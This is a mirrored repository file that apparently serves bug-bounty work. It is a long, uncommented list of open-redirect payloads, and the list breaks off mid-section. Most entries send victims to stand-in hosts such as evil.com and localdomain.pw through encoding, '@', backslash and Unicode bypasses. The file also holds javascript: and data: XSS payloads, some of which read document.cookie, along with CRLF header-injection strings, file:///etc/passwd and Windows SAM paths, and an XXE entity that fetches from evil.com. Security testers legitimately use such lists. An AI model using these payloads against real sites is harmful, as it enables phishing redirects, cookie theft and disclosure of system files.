mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
bc2ccbb10e
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
804 lines
33 KiB
Plaintext
804 lines
33 KiB
Plaintext
# Open Redirect Payloads
|
|
|
|
## Basic External URLs
|
|
http://evil.com
|
|
https://evil.com
|
|
//evil.com
|
|
///evil.com
|
|
////evil.com
|
|
http://evil.com/
|
|
https://evil.com/
|
|
//evil.com/
|
|
|
|
## Common Parameter Names to Test
|
|
?url=http://evil.com
|
|
?redirect=http://evil.com
|
|
?next=http://evil.com
|
|
?return=http://evil.com
|
|
?continue=http://evil.com
|
|
?destination=http://evil.com
|
|
?redir=http://evil.com
|
|
?returnTo=http://evil.com
|
|
?returnUrl=http://evil.com
|
|
?redirectUrl=http://evil.com
|
|
?redirect_uri=http://evil.com
|
|
?callback=http://evil.com
|
|
?return_to=http://evil.com
|
|
?goto=http://evil.com
|
|
?target=http://evil.com
|
|
?link=http://evil.com
|
|
?out=http://evil.com
|
|
?view=http://evil.com
|
|
?to=http://evil.com
|
|
?image_url=http://evil.com
|
|
?go=http://evil.com
|
|
?file=http://evil.com
|
|
?val=http://evil.com
|
|
?validate=http://evil.com
|
|
?domain=http://evil.com
|
|
?checkout_url=http://evil.com
|
|
?success=http://evil.com
|
|
?failure=http://evil.com
|
|
?login=http://evil.com
|
|
?logout=http://evil.com
|
|
|
|
## Protocol Manipulation
|
|
///evil.com
|
|
////evil.com
|
|
/////evil.com
|
|
\\evil.com
|
|
\\\\evil.com
|
|
\/\/evil.com
|
|
/\/\/evil.com
|
|
|
|
## Using @ Symbol
|
|
http://legitimate.com@evil.com
|
|
https://legitimate.com@evil.com
|
|
//legitimate.com@evil.com
|
|
http://legitimate.com%40evil.com
|
|
|
|
## URL Encoding
|
|
http%3A%2F%2Fevil.com
|
|
https%3A%2F%2Fevil.com
|
|
%2F%2Fevil.com
|
|
http%3A%2F%2Fevil%2Ecom
|
|
https%3A%2F%2Fevil%2Ecom
|
|
|
|
## Double URL Encoding
|
|
http%253A%252F%252Fevil.com
|
|
https%253A%252F%252Fevil.com
|
|
%252F%252Fevil.com
|
|
|
|
## Unicode/UTF-8 Encoding
|
|
http://evil%E3%80%82com
|
|
//evil%E3%80%82com
|
|
//evil%u2215com
|
|
//evil%u2216com
|
|
|
|
## Null Byte Bypass
|
|
http://evil.com%00.legitimate.com
|
|
https://evil.com%00.legitimate.com
|
|
//evil.com%00.legitimate.com
|
|
|
|
## Whitespace Bypass
|
|
http://evil.com%20
|
|
http://evil.com%09
|
|
http://evil.com%0a
|
|
http://evil.com%0d
|
|
|
|
## Using Localhost/Internal IPs
|
|
http://127.0.0.1
|
|
http://localhost
|
|
http://0.0.0.0
|
|
http://[::1]
|
|
http://2130706433 (decimal IP)
|
|
http://0x7f000001 (hex IP)
|
|
|
|
## Domain Manipulation
|
|
http://evil.com.legitimate.com
|
|
http://legitimate.com.evil.com
|
|
http://evil-legitimate.com
|
|
http://legitimate-evil.com
|
|
|
|
## Subdomain Takeover
|
|
http://subdomain.legitimate.com
|
|
//subdomain.legitimate.com
|
|
|
|
## XSS via Redirect (javascript: protocol)
|
|
javascript:alert(1)
|
|
javascript:alert('XSS')
|
|
javascript://evil.com%0Aalert(1)
|
|
javascript:eval(atob('YWxlcnQoMSk='))
|
|
|
|
## Data URI
|
|
data:text/html,<script>alert(1)</script>
|
|
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
|
|
|
## File Protocol
|
|
file:///etc/passwd
|
|
file://C:/Windows/System32/config/sam
|
|
|
|
## Wildcard Bypasses
|
|
http://evil*.com
|
|
http://*.evil.com
|
|
|
|
## Bypass using Backslash
|
|
http:\\evil.com
|
|
https:\\evil.com
|
|
|
|
## Using Question Mark
|
|
http://legitimate.com?evil.com
|
|
http://legitimate.com?@evil.com
|
|
|
|
## Using Hash
|
|
http://legitimate.com#evil.com
|
|
http://legitimate.com#@evil.com
|
|
|
|
## Bypass with Partial URL
|
|
evil.com
|
|
//evil.com
|
|
///evil.com
|
|
|
|
## Using Different TLDs
|
|
http://evil.co
|
|
http://evil.io
|
|
http://evil.net
|
|
http://evil.org
|
|
|
|
## CRLF Injection for Header Manipulation
|
|
%0d%0aLocation:%20http://evil.com
|
|
%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:25%0d%0a%0d%0a<script>alert(1)</script>
|
|
%0aLocation:%20http://evil.com
|
|
|
|
## IPv6 Addresses
|
|
http://[::ffff:7f00:1]
|
|
http://[0:0:0:0:0:ffff:127.0.0.1]
|
|
|
|
## Punycode/IDN Homograph
|
|
http://xn--e1awd7f.com (example using Cyrillic characters)
|
|
http://xn--80a7a.com
|
|
|
|
## Using Subpaths
|
|
http://legitimate.com/redirect?url=http://evil.com
|
|
http://legitimate.com/redirect?url=//evil.com
|
|
http://legitimate.com/redirect?url=///evil.com
|
|
|
|
## Combined Techniques
|
|
http://legitimate.com@evil.com?redirect=http://evil.com
|
|
//legitimate.com@evil.com%2F
|
|
http://evil.com%23legitimate.com
|
|
http://evil.com%3Flegitimate.com
|
|
|
|
## Special Characters
|
|
http://evil。com (using Unicode dot)
|
|
http://evil。com (using full-width dot)
|
|
http://evil%E3%80%82com
|
|
|
|
## Bypass with URL Fragments
|
|
#http://evil.com
|
|
#//evil.com
|
|
|
|
## Using Meta Refresh
|
|
<meta http-equiv="refresh" content="0;url=http://evil.com">
|
|
|
|
## Mixed Case to Bypass Filters
|
|
HTtp://evil.com
|
|
HttPs://evil.com
|
|
hTTp://evil.com
|
|
|
|
## Decimal Encoding
|
|
http://1.2.3.4 (where 1.2.3.4 is the decimal representation)
|
|
|
|
## Octal Encoding
|
|
http://0177.0.0.01 (octal for 127.0.0.1)
|
|
|
|
## Using Port Numbers
|
|
http://evil.com:80
|
|
http://evil.com:443
|
|
http://evil.com:8080
|
|
|
|
## Path Confusion
|
|
/http://evil.com
|
|
\/http://evil.com
|
|
//http://evil.com
|
|
|
|
## Relative Path Manipulation
|
|
../../../evil.com
|
|
..%2F..%2F..%2Fevil.com
|
|
|
|
## Using Open Graph Protocol
|
|
http://legitimate.com/og?image=http://evil.com/image.jpg
|
|
|
|
## Flash-based Redirect
|
|
http://legitimate.com/flash.swf?url=http://evil.com
|
|
|
|
## PDF-based Redirect
|
|
http://legitimate.com/file.pdf#http://evil.com
|
|
|
|
## Using Referrer Header
|
|
Referer: http://evil.com
|
|
|
|
## XML External Entity (XXE) for Redirect
|
|
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com">]><foo>&xxe;</foo>
|
|
|
|
## Advanced Open Redirect Payloads
|
|
|
|
//localdomain.pw/%2f..
|
|
//www.whitelisteddomain.tld@localdomain.pw/%2f..
|
|
///localdomain.pw/%2f..
|
|
///www.whitelisteddomain.tld@localdomain.pw/%2f..
|
|
////localdomain.pw/%2f..
|
|
////www.whitelisteddomain.tld@localdomain.pw/%2f..
|
|
https://localdomain.pw/%2f..
|
|
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
|
|
/https://localdomain.pw/%2f..
|
|
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
|
|
//localdomain.pw/%2f%2e%2e
|
|
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
///localdomain.pw/%2f%2e%2e
|
|
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
////localdomain.pw/%2f%2e%2e
|
|
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
https://localdomain.pw/%2f%2e%2e
|
|
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
/https://localdomain.pw/%2f%2e%2e
|
|
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
//localdomain.pw/
|
|
//www.whitelisteddomain.tld@localdomain.pw/
|
|
///localdomain.pw/
|
|
///www.whitelisteddomain.tld@localdomain.pw/
|
|
////localdomain.pw/
|
|
////www.whitelisteddomain.tld@localdomain.pw/
|
|
https://localdomain.pw/
|
|
https://www.whitelisteddomain.tld@localdomain.pw/
|
|
/https://localdomain.pw/
|
|
/https://www.whitelisteddomain.tld@localdomain.pw/
|
|
//localdomain.pw//
|
|
//www.whitelisteddomain.tld@localdomain.pw//
|
|
///localdomain.pw//
|
|
///www.whitelisteddomain.tld@localdomain.pw//
|
|
////localdomain.pw//
|
|
////www.whitelisteddomain.tld@localdomain.pw//
|
|
https://localdomain.pw//
|
|
https://www.whitelisteddomain.tld@localdomain.pw//
|
|
//https://localdomain.pw//
|
|
//https://www.whitelisteddomain.tld@localdomain.pw//
|
|
//localdomain.pw/%2e%2e%2f
|
|
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
|
|
///localdomain.pw/%2e%2e%2f
|
|
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
|
|
////localdomain.pw/%2e%2e%2f
|
|
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
|
|
https://localdomain.pw/%2e%2e%2f
|
|
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
|
|
//https://localdomain.pw/%2e%2e%2f
|
|
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
|
|
///localdomain.pw/%2e%2e
|
|
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
|
|
////localdomain.pw/%2e%2e
|
|
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
|
|
https:///localdomain.pw/%2e%2e
|
|
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
|
|
//https:///localdomain.pw/%2e%2e
|
|
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
|
|
/https://localdomain.pw/%2e%2e
|
|
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
|
|
///localdomain.pw/%2f%2e%2e
|
|
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
////localdomain.pw/%2f%2e%2e
|
|
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
https:///localdomain.pw/%2f%2e%2e
|
|
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
/https://localdomain.pw/%2f%2e%2e
|
|
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
/https:///localdomain.pw/%2f%2e%2e
|
|
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
|
|
/%09/localdomain.pw
|
|
/%09/www.whitelisteddomain.tld@localdomain.pw
|
|
//%09/localdomain.pw
|
|
//%09/www.whitelisteddomain.tld@localdomain.pw
|
|
///%09/localdomain.pw
|
|
///%09/www.whitelisteddomain.tld@localdomain.pw
|
|
////%09/localdomain.pw
|
|
////%09/www.whitelisteddomain.tld@localdomain.pw
|
|
https://%09/localdomain.pw
|
|
https://%09/www.whitelisteddomain.tld@localdomain.pw
|
|
/%5clocaldomain.pw
|
|
/%5cwww.whitelisteddomain.tld@localdomain.pw
|
|
//%5clocaldomain.pw
|
|
//%5cwww.whitelisteddomain.tld@localdomain.pw
|
|
///%5clocaldomain.pw
|
|
///%5cwww.whitelisteddomain.tld@localdomain.pw
|
|
////%5clocaldomain.pw
|
|
////%5cwww.whitelisteddomain.tld@localdomain.pw
|
|
https://%5clocaldomain.pw
|
|
https://%5cwww.whitelisteddomain.tld@localdomain.pw
|
|
/https://%5clocaldomain.pw
|
|
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
|
|
https://localdomain.pw
|
|
https://www.whitelisteddomain.tld@localdomain.pw
|
|
javascript:alert(1);
|
|
javascript:alert(1)
|
|
//javascript:alert(1);
|
|
/javascript:alert(1);
|
|
//javascript:alert(1)
|
|
/javascript:alert(1)
|
|
javascript:%0aalert`1`
|
|
/%5cjavascript:alert(1);
|
|
/%5cjavascript:alert(1)
|
|
//%5cjavascript:alert(1);
|
|
//%5cjavascript:alert(1)
|
|
/%09/javascript:alert(1);
|
|
/%09/javascript:alert(1)
|
|
java%0d%0ascript%0d%0a:alert(0)
|
|
//localdomain.pw
|
|
http:localdomain.pw
|
|
https:localdomain.pw
|
|
//localdomain%E3%80%82pw
|
|
\/\/localdomain.pw/
|
|
/\/localdomain.pw/
|
|
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
|
|
//\/localdomain.pw/
|
|
//localdomain%00.pw
|
|
https://www.whitelisteddomain.tld/https://localdomain.pw/
|
|
";alert(0);//
|
|
javascript://www.whitelisteddomain.tld?%a0alert%281%29
|
|
http://0xd8.0x3a.0xd6.0xce
|
|
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
|
|
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
|
|
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
|
|
http://0xd83ad6ce
|
|
http://www.whitelisteddomain.tld@0xd83ad6ce
|
|
http://3H6k7lIAiqjfNeN@0xd83ad6ce
|
|
http://XY>.7d8T\205pZM@0xd83ad6ce
|
|
http://3627734734
|
|
http://www.whitelisteddomain.tld@3627734734
|
|
http://3H6k7lIAiqjfNeN@3627734734
|
|
http://XY>.7d8T\205pZM@3627734734
|
|
http://472.314.470.462
|
|
http://www.whitelisteddomain.tld@472.314.470.462
|
|
http://3H6k7lIAiqjfNeN@472.314.470.462
|
|
http://XY>.7d8T\205pZM@472.314.470.462
|
|
http://0330.072.0326.0316
|
|
http://www.whitelisteddomain.tld@0330.072.0326.0316
|
|
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
|
|
http://XY>.7d8T\205pZM@0330.072.0326.0316
|
|
http://00330.00072.0000326.00000316
|
|
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
|
|
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
|
|
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
|
|
http://[::216.58.214.206]
|
|
http://www.whitelisteddomain.tld@[::216.58.214.206]
|
|
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
|
|
http://XY>.7d8T\205pZM@[::216.58.214.206]
|
|
http://[::ffff:216.58.214.206]
|
|
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
|
|
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
|
|
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
|
|
http://0xd8.072.54990
|
|
http://www.whitelisteddomain.tld@0xd8.072.54990
|
|
http://3H6k7lIAiqjfNeN@0xd8.072.54990
|
|
http://XY>.7d8T\205pZM@0xd8.072.54990
|
|
http://0xd8.3856078
|
|
http://www.whitelisteddomain.tld@0xd8.3856078
|
|
http://3H6k7lIAiqjfNeN@0xd8.3856078
|
|
http://XY>.7d8T\205pZM@0xd8.3856078
|
|
http://00330.3856078
|
|
http://www.whitelisteddomain.tld@00330.3856078
|
|
http://3H6k7lIAiqjfNeN@00330.3856078
|
|
http://XY>.7d8T\205pZM@00330.3856078
|
|
http://00330.0x3a.54990
|
|
http://www.whitelisteddomain.tld@00330.0x3a.54990
|
|
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
|
|
http://XY>.7d8T\205pZM@00330.0x3a.54990
|
|
http:0xd8.0x3a.0xd6.0xce
|
|
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
|
|
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
|
|
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
|
|
http:0xd83ad6ce
|
|
http:www.whitelisteddomain.tld@0xd83ad6ce
|
|
http:3H6k7lIAiqjfNeN@0xd83ad6ce
|
|
http:XY>.7d8T\205pZM@0xd83ad6ce
|
|
http:3627734734
|
|
http:www.whitelisteddomain.tld@3627734734
|
|
http:3H6k7lIAiqjfNeN@3627734734
|
|
http:XY>.7d8T\205pZM@3627734734
|
|
http:472.314.470.462
|
|
http:www.whitelisteddomain.tld@472.314.470.462
|
|
http:3H6k7lIAiqjfNeN@472.314.470.462
|
|
http:XY>.7d8T\205pZM@472.314.470.462
|
|
http:0330.072.0326.0316
|
|
http:www.whitelisteddomain.tld@0330.072.0326.0316
|
|
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
|
|
http:XY>.7d8T\205pZM@0330.072.0326.0316
|
|
http:00330.00072.0000326.00000316
|
|
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
|
|
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
|
|
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
|
|
http:[::216.58.214.206]
|
|
http:www.whitelisteddomain.tld@[::216.58.214.206]
|
|
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
|
|
http:XY>.7d8T\205pZM@[::216.58.214.206]
|
|
http:[::ffff:216.58.214.206]
|
|
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
|
|
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
|
|
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
|
|
http:0xd8.072.54990
|
|
http:www.whitelisteddomain.tld@0xd8.072.54990
|
|
http:3H6k7lIAiqjfNeN@0xd8.072.54990
|
|
http:XY>.7d8T\205pZM@0xd8.072.54990
|
|
http:0xd8.3856078
|
|
http:www.whitelisteddomain.tld@0xd8.3856078
|
|
http:3H6k7lIAiqjfNeN@0xd8.3856078
|
|
http:XY>.7d8T\205pZM@0xd8.3856078
|
|
http:00330.3856078
|
|
http:www.whitelisteddomain.tld@00330.3856078
|
|
http:3H6k7lIAiqjfNeN@00330.3856078
|
|
http:XY>.7d8T\205pZM@00330.3856078
|
|
http:00330.0x3a.54990
|
|
http:www.whitelisteddomain.tld@00330.0x3a.54990
|
|
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
|
|
http:XY>.7d8T\205pZM@00330.0x3a.54990
|
|
〱localdomain.pw
|
|
〵localdomain.pw
|
|
ゝlocaldomain.pw
|
|
ーlocaldomain.pw
|
|
ーlocaldomain.pw
|
|
/〱localdomain.pw
|
|
/〵localdomain.pw
|
|
/ゝlocaldomain.pw
|
|
/ーlocaldomain.pw
|
|
/ーlocaldomain.pw
|
|
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
|
|
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
|
|
<>javascript:alert(1);
|
|
<>//localdomain.pw
|
|
//localdomain.pw\@www.whitelisteddomain.tld
|
|
https://:@localdomain.pw\@www.whitelisteddomain.tld
|
|
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
|
|
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
|
|
ja\nva\tscript\r:alert(1)
|
|
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
|
|
\152\141\166\141\163\143\162\151\160\164\072alert(1)
|
|
http://localdomain.pw:80#@www.whitelisteddomain.tld/
|
|
http://localdomain.pw:80?@www.whitelisteddomain.tld/
|
|
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
|
|
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@localdomain.pw/
|
|
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
|
|
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@localdomain.pw/
|
|
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
|
|
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
|
|
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
|
|
http://www.whitelisteddomain.tld⁺&@localdomain.pw#⁺@www.whitelisteddomain.tld/
|
|
http://localdomain.pw\twww.whitelisteddomain.tld/
|
|
//localdomain.pw:80#@www.whitelisteddomain.tld/
|
|
//localdomain.pw:80?@www.whitelisteddomain.tld/
|
|
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
|
|
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@localdomain.pw/
|
|
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
|
|
//XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@localdomain.pw/
|
|
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
|
|
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
|
|
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
|
|
//www.whitelisteddomain.tld⁺&@localdomain.pw#⁺@www.whitelisteddomain.tld/
|
|
//localdomain.pw\twww.whitelisteddomain.tld/
|
|
//;@localdomain.pw
|
|
//﹔@localdomain.pw
|
|
http://;@localdomain.pw
|
|
http://﹔@localdomain.pw
|
|
@localdomain.pw
|
|
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
|
|
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
|
|
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
|
|
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
|
|
http://localdomain.pw%3F.www.whitelisteddomain.tld/
|
|
http://localdomain.pw%23.www.whitelisteddomain.tld/
|
|
http://www.whitelisteddomain.tld:80%40localdomain.pw/
|
|
http://www.whitelisteddomain.tld%2elocaldomain.pw/
|
|
/x:1/:///%01javascript:alert(document.cookie)/
|
|
/https:/%5clocaldomain.pw/
|
|
https:/%5clocaldomain.pw/
|
|
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
|
|
javascripT://www.whitelisteddomain.tld/%250d%250aalert(document.cookie)
|
|
/http://localdomain.pw
|
|
/%2f%2flocaldomain.pw
|
|
//%2f%2flocaldomain.pw
|
|
/localdomain.pw/%2f%2e%2e
|
|
/http:/localdomain.pw
|
|
http:/localdomain.pw
|
|
/.localdomain.pw
|
|
http://.localdomain.pw
|
|
.localdomain.pw
|
|
///\;@localdomain.pw
|
|
///\﹔@localdomain.pw
|
|
///localdomain.pw
|
|
/////localdomain.pw/
|
|
/////localdomain.pw
|
|
ja	vascript:alert(1)
|
|
ja
vascript:alert(1)
|
|
ja
vascript:alert(1)
|
|
javascript:alert()
|
|
javascript:alert()
|
|
javascript:alert()
|
|
javascript:alert(1)
|
|
javascript:alert()
|
|
javascript:alert()
|
|
javascript:alert``
|
|
javascript:alert%60%60
|
|
javascript:x='%27-alert(1)-%27';
|
|
javascript:%61%6c%65%72%74%28%29
|
|
javascript:a\u006Cert``"
|
|
javascript:\u0061\u006C\u0065\u0072\u0074``
|
|
java%0ascript:alert(1)
|
|
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
|
|
java%09script:alert(1)
|
|
java%0dscript:alert(1)
|
|
javascript://%0aalert(1)
|
|
javascript://%0aalert`1`
|
|
Javas%26%2399;ript:alert(1)
|
|
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
|
|
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
|
|
http://www.localdomain.pw\.www.whitelisteddomain.tld
|
|
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
|
|
%01https://localdomain.pw
|
|
www.whitelisteddomain.tld;@localdomain.pw
|
|
www.whitelisteddomain.tld﹔@localdomain.pw
|
|
https://www.whitelisteddomain.tld;@localdomain.pw
|
|
https://www.whitelisteddomain.tld﹔@localdomain.pw
|
|
http:%0a%0dlocaldomain.pw
|
|
https://%0a%0dlocaldomain.pw
|
|
localdomain.pw/www.whitelisteddomain.tld
|
|
https://localdomain.pw/www.whitelisteddomain.tld
|
|
//localdomain.pw/www.whitelisteddomain.tld
|
|
|
|
## Unicode Domain Variations
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
//https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
//https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
|
|
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
|
|
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
